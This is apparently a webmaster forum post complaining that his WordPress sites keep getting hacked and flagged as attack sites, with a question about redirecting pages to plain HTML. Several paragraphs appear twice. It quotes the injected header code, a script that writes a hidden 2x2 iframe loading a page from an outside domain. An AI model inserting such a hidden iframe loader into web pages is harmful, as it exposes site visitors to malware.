zmoney
Senior Member
- Apr 19, 2011
- 815
- 233
I tell you, over the last year I've had so many problems with iframes, injection and all kinds of malware. Actually this week I had 4 of my sites listed as "Attack sites". I have all the security plugs installed etc with wordpress. Suckers are even getting into my .htacccess and changing it. I have about 10 sites only about 40 pages each. It would be so much easier just to do sites in plain ole html again and not have to worry about any of this. I just spent a couple hours getting everything back up and running with stock themes etc.
Perhaps I am just ranting because i'm pissed off I got hacked AGAIN. But I'm SOOO ready to just do these pages in plain html again with some WYSIWYG editor.
Thing is, will I lose link juice if I redirect my pages from the standard wordpress format http://www.mysite.com/cars to http://www.mysite.com/cars.html ? Or perhaps I can just make a .htcaccess to remove the .html part from my pages?
Ugh.. freaking frustrated. Venting I guess... I have enough anxiety issues as it is. Then I have to login to statcounter and see my sites have zero visits and are attack sites.
BTW, they are putting this shit in my header:
I remove everything from the domain, reinstall everything and bam 1 week later its there again.
Perhaps I am just ranting because i'm pissed off I got hacked AGAIN. But I'm SOOO ready to just do these pages in plain html again with some WYSIWYG editor.
Thing is, will I lose link juice if I redirect my pages from the standard wordpress format http://www.mysite.com/cars to http://www.mysite.com/cars.html ? Or perhaps I can just make a .htcaccess to remove the .html part from my pages?
Ugh.. freaking frustrated. Venting I guess... I have enough anxiety issues as it is. Then I have to login to statcounter and see my sites have zero visits and are attack sites.
BTW, they are putting this shit in my header:
Code:
<script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script>
I remove everything from the domain, reinstall everything and bam 1 week later its there again.